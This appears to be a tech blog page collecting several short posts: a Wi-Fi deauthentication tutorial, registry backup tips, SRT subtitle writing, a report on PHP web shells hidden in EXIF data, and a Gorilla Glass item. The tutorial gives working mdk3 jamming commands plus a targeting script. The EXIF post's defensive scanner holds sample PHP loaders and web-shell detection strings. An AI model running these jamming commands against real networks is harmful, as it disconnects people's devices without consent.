Once you've done so, type ifconfig or ip a again to get the new name of the device. You can expect it to be something like "wlan0mon." When you have this information, you can run the tool to deauthenticate everything nearby. This is noisy, less effective than targeted jamming, and may require more than one card to work persistently.
In my tests, one network card attacking everything nearby caused few noticeable disruptions, whereas three network cards attacking everything nearby caused noticeably annoying disconnections from the network.

To execute the attack, type the following in a terminal window, with wlan0mon as the name of your adapter in monitor mode.

mdk3 wlan0mon d

Because this attack has to hop channels, it is likely to miss some APs, and it may not be very fast. It's also very disruptive, as it can disconnect anything in range regardless of whether you have permission to test it or whether it's relevant to what you're doing.

Step 3: Jam a Channel

A better option than jamming an area is to jam a single channel. To know which channel to jam, we can use another tool, Airodump-ng, to discover what channel our target is on. With our card in monitor mode as wlan0mon, type the following command to see information about all nearby wireless networks.

airodump-ng wlan0mon

This displays all nearby access points along with information about them, including the channel (the CH column) each one is on. Limiting the attack to our target's channel confines its effect to that one channel rather than marauding around attacking anything that moves. Once we know the channel the AP is on, press Ctrl-C to stop the scan and type the following into a terminal window, with channel 6 being the channel we're attacking. MDK3 still needs the test mode (d) before its options.

mdk3 wlan0mon d -c 6

Jamming a channel is very effective, but it affects every AP and every device operating on that channel. This can still be too noisy, so we'll need to refine it further to match the targeting capabilities of Aireplay-ng.

Step 4: Whitelist & Blacklist Devices

Once we have a specific channel to attack, we can be more precise by adding a blacklist or a whitelist. To do this, we'll re-run our Airodump-ng scan, and this time we'll copy the MAC address of the device we wish to attack. I have tested doing this for both the address of the AP and the device you want to attack.
Using the MAC address of the AP will attack everything on it, whereas adding the MAC address of the device will attack only that device and nothing else on the network. To get this information, we can type the following to find the APs on the channel we were targeting before, in this case channel 6.

airodump-ng wlan0mon -c 6

By specifying the channel we found before, we cut down on the number of devices we see. To find devices connected to our target network, look at the bottom of the output, where each station is listed with the BSSID (the AP's MAC address) it is associated with; the ones we want show our target network's BSSID. Once we find an associated MAC address, we can target it easily. Copy the MAC address, then open a new terminal window. Type nano ~/black.txt and press Enter to open a text editor. Paste the MAC address of the device you wish to jam (one address per line if there are several), then press Ctrl-X, answer Y to save, and press Enter to confirm the filename. Now we can run MDK3 against the target network with the command below, where black.txt is the file we just created containing the MAC addresses we wish to jam.

mdk3 wlan0mon d -c 6 -b ~/black.txt

Running this should very rapidly and persistently jam the device you indicated. In reverse, you can list the networks you want to leave alone the same way and run the command with the -w flag instead, which attacks everything else on the channel.

Protected Management Frames & WPA3

While these attacks can be scary depending on what is being targeted, such as a home security camera, the risk can be mitigated by using Ethernet wherever possible and upgrading to WPA3 when devices supporting it become available. One of the core differences between WPA2 and WPA3 is that WPA3 makes protected management frames (802.11w) mandatory, so deauthentication and disassociation frames are cryptographically protected and a forged one from an attacker is simply discarded; the attacks above cannot be carried out against such a connection.
Until then, you can use devices that support protected management frames (WPA2 with 802.11w enabled on both the AP and the client), or, if you suspect that you're being targeted with an attack like this, you can detect it using an intrusion detection system (IDS). Kismet can be used as an IDS to detect this sort of attack, as it will warn you when it sees disassociation or deauthentication frames being sprayed across a network.
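Step 4's manual chore of reading the station list and pasting MAC addresses into black.txt can be automated from airodump-ng's CSV output: adding -w scan to the airodump-ng command writes scan-01.csv, whose second table lists each station with the BSSID it is associated with. The script below is an added example of mine, not part of the article or of aircrack-ng. The CSV text embedded in it is constructed to match that file's layout, using the article's placeholder addresses; the helper that extracts the channel is there so the -c value can be set from the same file.

```python
"""Added example, not from the article or aircrack-ng: pick the stations
associated with a target BSSID out of airodump-ng's CSV dump and print them
in the one-MAC-per-line form that mdk3 d -b expects."""
import sys

# Constructed to match the layout of <prefix>-01.csv written by airodump-ng -w
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F2:9F:C2:34:55:69, 2018-07-20 10:00:01, 2018-07-20 10:05:00,  6,  54, WPA2, CCMP, PSK, -41,  312,  0,   0.  0.  0.  0,   9, TargetNet,
00:11:22:33:44:55, 2018-07-20 10:00:02, 2018-07-20 10:05:00,  6,  54, WPA2, CCMP, PSK, -67,  290,  0,   0.  0.  0.  0,   8, Neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
A4:14:37:44:1F:AC, 2018-07-20 10:00:05, 2018-07-20 10:04:58, -48,  140, F2:9F:C2:34:55:69, TargetNet
DE:AD:BE:EF:00:01, 2018-07-20 10:01:10, 2018-07-20 10:04:50, -55,   77, F2:9F:C2:34:55:69,
CA:FE:00:00:00:02, 2018-07-20 10:02:00, 2018-07-20 10:04:59, -70,   12, 00:11:22:33:44:55, Neighbor
12:34:56:78:9A:BC, 2018-07-20 10:03:00, 2018-07-20 10:04:00, -80,    3, (not associated)  , TargetNet,CoffeeShop
"""


def split_sections(csv_text):
    """airodump-ng writes an AP table, then a station table headed 'Station MAC'.
    Blank lines (including the one the real file starts with) are dropped."""
    lines = [line.rstrip("\r") for line in csv_text.splitlines()]
    for i, line in enumerate(lines):
        if line.startswith("Station MAC"):
            return [l for l in lines[:i] if l], [l for l in lines[i:] if l]
    return [l for l in lines if l], []


def stations_of(csv_text, bssid):
    """MACs of stations seen associated with `bssid` (case-insensitive).
    Probed ESSIDs may themselves contain commas, so only the first six
    fields are trusted; the BSSID column is index 5. Rows marked
    '(not associated)' never match a real BSSID."""
    _, station_lines = split_sections(csv_text)
    wanted = bssid.strip().upper()
    found = []
    for line in station_lines[1:]:          # [0] is the header row
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 6 or not fields[0]:
            continue
        if fields[5].upper() == wanted:
            found.append(fields[0].upper())
    return found


def channel_of(csv_text, bssid):
    """Channel the AP was last seen on (column 3 of the AP table), or None."""
    ap_lines, _ = split_sections(csv_text)
    wanted = bssid.strip().upper()
    for line in ap_lines[1:]:
        fields = [f.strip() for f in line.split(",")]
        if len(fields) > 3 and fields[0].upper() == wanted:
            return int(fields[3])
    return None


if __name__ == "__main__":
    # usage: python3 blacklist.py scan-01.csv F2:9F:C2:34:55:69 > ~/black.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    target = sys.argv[2] if len(sys.argv) > 2 else "F2:9F:C2:34:55:69"
    print("\n".join(stations_of(text, target)))
    print(f"# channel {channel_of(text, target)}", file=sys.stderr)
```

Run against a real scan-01.csv and redirect stdout into black.txt; the channel goes to stderr so it does not end up in the blacklist. Stations that airodump-ng only saw probing (the "(not associated)" rows) are deliberately left out, since deauthenticating them achieves nothing.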
    • Anastasis
Whenever you tinker with the Windows registry, it is a good idea, before you start, to back up the registry keys you want to edit, in case something goes wrong. In that case a backup will help you restore the Windows registry to the state it was in. Note that it is very easy to back up individual keys. Below we will look at how to back up and restore registry keys.

First, let's see how you can take a backup: Open the Windows registry. In the search box type regedit and open the icon that appears in the results. From there you can find the key you want to back up. Right-click it and select 'Export'. Save the registry key. If that key contains other keys beneath it, those will be saved as well.

Restoring registry keys: There are two ways to restore a registry key. The first is from the Windows Registry Editor: File > Import, then select the registry key you want to restore.

The other way is simpler. Find the key in the folder where you saved it, right-click it and select "Merge", as you see below. A warning will appear; accept it and the key will be added without needing to open the Registry Editor. You will need administrator rights to do all of the above. We should mention that if you plan to back up many registry keys, it is a good idea to keep them organized, which will make things much easier later when you want to do the restore.

Read more...
    • Anastasis
Can I make my own subtitles?

A subtitle file works in any player that supports it. Subtitles are not hard to find for films or TV series. If you buy a Blu-ray or a DVD, it usually includes the subtitles too. But if you make your own videos, you may need to create your own.

Below we will see how you can do that.

To create your own subtitles, you first need the content of the video you want to add them to. Watch the video and keep notes of the subtitles you want to add, or simply use some software. If you cannot find free software, you can use the dictation feature on your phone; both iOS and Android have excellent dictation features. Once you have the text you want to add, you will need an application to create the subtitles. A simple, free option is a text editor such as Notepad. We recommend the open source application Notepad++.

Open Notepad. In general:

You will need to specify the color of the text on screen.

Each line you add to the subtitles you create must contain two things: the sequence number and how long it should remain visible on screen.

You can also (optionally) use HTML tags, such as the ones for italics, to write text in italics.

In the example below, '1' is the sequence number. It is the first line that will appear when the subtitles start showing.

1
00:00:26,484 --> 00:00:27,360
Well done.

The time is shown on the next line, i.e. the numbers 00:00:26,484 --> 00:00:27,360. Those numbers decide when line 1 appears and when it disappears.

The subtitle syntax is:

[Sequence number]
[Time the subtitle appears] --> [Time the subtitle disappears]
[Subtitle text]

How the numbers in the time are written: use the following form for the time:

[hours]:[minutes]:[seconds],[milliseconds]

Example:

30
00:05:14,647 --> 00:05:15,481
That was it.

Follow this procedure to enter all of the text. If you want to add color to the text, use HTML tags. For example, the subtitle above can become:

Choose the color you want from here.

If you want to add italics to the text, again use HTML tags. For example, the subtitle above can become:

Color together with italics:

More HTML tags

Once you have finished the subtitles, you can save the file with the .srt extension. Again, you can do this with any text editor; Notepad++ includes an option to save as .srt.

https://iguru.gr/2018/07/19/subtitles-creation/
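As an added example that is not part of the post above, the Python below writes the SRT layout the post describes and reads it back, keeping times as integer milliseconds so cues can be shifted or compared exactly. The two cues are constructed from the post's own example timestamps, with the HTML color and italics tags it mentions.

```python
"""Added example, not from the post: write the SRT layout described above and
read it back, keeping times in milliseconds so they can be shifted or compared."""
import re

TIME_RE = re.compile(r"(\d{2}):(\d{2}):(\d{2}),(\d{3})")


def fmt_time(ms):
    """milliseconds -> HH:MM:SS,mmm (a comma, not a dot, is what SRT uses)."""
    hours, rem = divmod(ms, 3_600_000)
    minutes, rem = divmod(rem, 60_000)
    seconds, millis = divmod(rem, 1000)
    return f"{hours:02d}:{minutes:02d}:{seconds:02d},{millis:03d}"


def parse_time(text):
    match = TIME_RE.fullmatch(text.strip())
    if not match:
        raise ValueError(f"bad SRT timestamp: {text!r}")
    h, m, s, ms = map(int, match.groups())
    return ((h * 60 + m) * 60 + s) * 1000 + ms


def write_srt(cues):
    """cues: list of (start_ms, end_ms, text). Numbering is generated, so cues
    only need to be in display order; text may carry <i> or <font color> tags."""
    blocks = []
    for number, (start, end, text) in enumerate(cues, 1):
        if end <= start:
            raise ValueError(f"cue {number} would disappear before it appears")
        blocks.append(f"{number}\n{fmt_time(start)} --> {fmt_time(end)}\n{text}")
    return "\n\n".join(blocks) + "\n"


def read_srt(srt_text):
    """Inverse of write_srt; multi-line cue text is preserved."""
    cues = []
    for block in re.split(r"\n\s*\n", srt_text.strip()):
        lines = block.splitlines()
        start, end = lines[1].split("-->")
        cues.append((parse_time(start), parse_time(end), "\n".join(lines[2:])))
    return cues


# Constructed cues using the post's two example timings and the tags it mentions
CUES = [
    (26_484, 27_360, "Well done."),
    (314_647, 315_481, '<font color="#ffff00"><i>That was it.</i></font>'),
]

if __name__ == "__main__":
    print(write_srt(CUES), end="")
```

Save the printed text with a .srt extension and any player that accepts SRT will load it; the end-before-start check catches the one mistake hand-typed timestamps most often contain.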
    • Anastasis
In the past, security researchers have encountered cases where notorious hackers were able to use the EXIF data of images to hide malicious code. This technique is still widely used to infect web users with malware. Going a step further, it was found that hackers have found a way to distribute malicious programs through trusted Google servers, such as those of googleusercontent. Unlike malware stored in text files, malicious payloads in images are much harder to detect. Moreover, it is even harder to report malware hosted on googleusercontent.com to Google.

For those who don't know, googleusercontent is Google's domain for serving user-provided content without affecting the security of Google's own pages. According to a report by Sucuri, the following code was found in a script that extracts the PayPal security code:

The script reads the EXIF data from a googleusercontent image, which was most likely uploaded by someone to a Google+ or Blogger account. When the UserComment section of the EXIF data was decoded, it turned out to be a script capable of uploading a web shell and arbitrary files. This points to a larger threat, as there is no way to detect the malware until the images' metadata is inspected and decoded. Even after the malware is flagged, one cannot know the true source of the image.

Read more...
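The post above says the payload only becomes visible once the image metadata is inspected and decoded. The Python below is an added example of mine, not code from the post or from Sucuri's report: a stdlib-only scanner that walks a JPEG's segments, parses the Exif TIFF structure to reach the UserComment tag, and flags PHP code found there, including one level of base64 wrapping. The JPEG builder exists only so the scanner can be exercised offline; the three images and the indicator strings are constructed, and the indicator list is a heuristic I chose rather than a published signature set.

```python
"""Added example, not from the post or from Sucuri's report: a stdlib-only
scanner that extracts the EXIF UserComment from a JPEG and flags PHP hidden
in it. build_jpeg_with_comment() constructs test images so it runs offline;
INDICATORS is a heuristic I chose, not a published signature set."""
import base64
import re
import struct

TAG_EXIF_IFD, TAG_USER_COMMENT = 0x8769, 0x9286
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}  # TIFF field types
INDICATORS = (b"<?php", b"eval(", b"base64_decode(", b"$_POST", b"$_FILES",
              b"move_uploaded_file(", b"system(", b"passthru(", b"shell_exec(")


def build_jpeg_with_comment(comment):
    """Minimal JPEG: SOI, one APP1/Exif segment (IFD0 -> Exif IFD -> UserComment), EOI.
    Offsets inside the TIFF: header 0-7, IFD0 at 8 (18 bytes), Exif IFD at 26, data at 44."""
    payload = b"ASCII\0\0\0" + comment  # UserComment = 8-byte charset code + text
    ifd0 = struct.pack("<HHHII", 1, TAG_EXIF_IFD, 4, 1, 26) + b"\0\0\0\0"
    exif = struct.pack("<HHHII", 1, TAG_USER_COMMENT, 7, len(payload), 44) + b"\0\0\0\0"
    tiff = b"II" + struct.pack("<HI", 0x2A, 8) + ifd0 + exif + payload
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def exif_segments(jpeg):
    """Yield the TIFF blob of each APP1/Exif segment; stop at SOS or EOI."""
    if jpeg[:2] != b"\xff\xd8":
        return
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):            # EOI / start of scan: no more metadata
            return
        length = struct.unpack_from(">H", jpeg, pos + 2)[0]
        body = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and body.startswith(b"Exif\0\0"):
            yield body[6:]
        pos += 2 + length


def read_ifd(tiff, offset, end):
    """{tag: raw_value_bytes} for the IFD at offset; values > 4 bytes are indirect."""
    count = struct.unpack_from(end + "H", tiff, offset)[0]
    entries = {}
    for i in range(count):
        at = offset + 2 + 12 * i
        tag, typ, n = struct.unpack_from(end + "HHI", tiff, at)
        size = TYPE_SIZES.get(typ, 1) * n
        start = at + 8 if size <= 4 else struct.unpack_from(end + "I", tiff, at + 8)[0]
        entries[tag] = tiff[start:start + size]
    return entries


def user_comment(tiff):
    """Bytes of the UserComment tag (charset code stripped), or None."""
    end = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if end is None:
        return None
    ifd0 = read_ifd(tiff, struct.unpack_from(end + "I", tiff, 4)[0], end)
    if TAG_EXIF_IFD not in ifd0:
        return None
    exif = read_ifd(tiff, struct.unpack(end + "I", ifd0[TAG_EXIF_IFD])[0], end)
    comment = exif.get(TAG_USER_COMMENT)
    return None if comment is None else comment[8:]


def scan_jpeg(jpeg):
    """(comment, indicators_hit). Also decodes one base64 run, the usual wrapper."""
    for tiff in exif_segments(jpeg):
        try:
            comment = user_comment(tiff)
        except struct.error:                  # truncated or malformed TIFF
            continue
        if comment is None:
            continue
        hits = [i for i in INDICATORS if i in comment]
        blob = re.search(rb"[A-Za-z0-9+/]{20,}={0,2}", comment)
        if blob:
            try:
                decoded = base64.b64decode(blob.group(0), validate=True)
                hits += [i for i in INDICATORS if i in decoded and i not in hits]
            except ValueError:
                pass
        return comment, hits
    return None, []


# Constructed samples: a holiday photo, a plain PHP loader, and a base64-wrapped one
BENIGN = build_jpeg_with_comment(b"Taken at the beach, summer 2018")
PLAIN_PHP = build_jpeg_with_comment(b'<?php eval(base64_decode($_POST["payload"])); ?>')
B64_PHP = build_jpeg_with_comment(base64.b64encode(b'<?php eval($_POST["c"]); ?>'))

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            comment, hits = scan_jpeg(fh.read())
        print(path, "SUSPICIOUS" if hits else "clean", hits)
```

Point it at uploaded images on a web server (python3 exifscan.py uploads/*.jpg) to get a quick triage; the scanner never executes anything, it only reads the metadata. It deliberately stops at the start-of-scan marker, since image data after that point cannot carry EXIF, and it treats a malformed TIFF block as "no comment" rather than crashing, which is what an attacker hoping to evade a scanner would try first.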
    • Anastasis
Smartphones, although they offer us a lot, are very fragile, and everyday use can easily lead to a cracked screen. A survey conducted by Motorola concluded that at least 50% of smartphone users have ended up with a cracked screen on their phone at least once in their life. But now there may be a solution for that! The recently announced Corning Gorilla Glass 6 promises to dramatically reduce the risk of your screen cracking or shattering. At a major event, Corning assured that the new Gorilla Glass 6 could survive up to 15 consecutive drops from a height of 1 m or less. According to the company, Corning Gorilla Glass 6 is "twice as good as Gorilla Glass 5" and is called "the toughest cover glass available for mobile devices". Almost all flagship devices, including mid- and high-end iPhones and Samsungs, use Corning Gorilla Glass. But every time, these companies fail to deliver a promising screen for their high prices. And even if it does not crack, the first drop from your pocket certainly weakens the screen with visible scratches on it. However, Corning believes the new product will not show a single crack even after repeated drops.

It will be interesting to see how the new Gorilla Glass performs on bezel-less phones, because in that case the impact is taken first by the glass on an edge-to-edge screen, unlike in the past, when the frame was the first thing to touch the ground. As for scratch resistance, the company said the glass will offer the same scratch resistance as the previous Gorilla Glass 5, but would perform better.

Read more...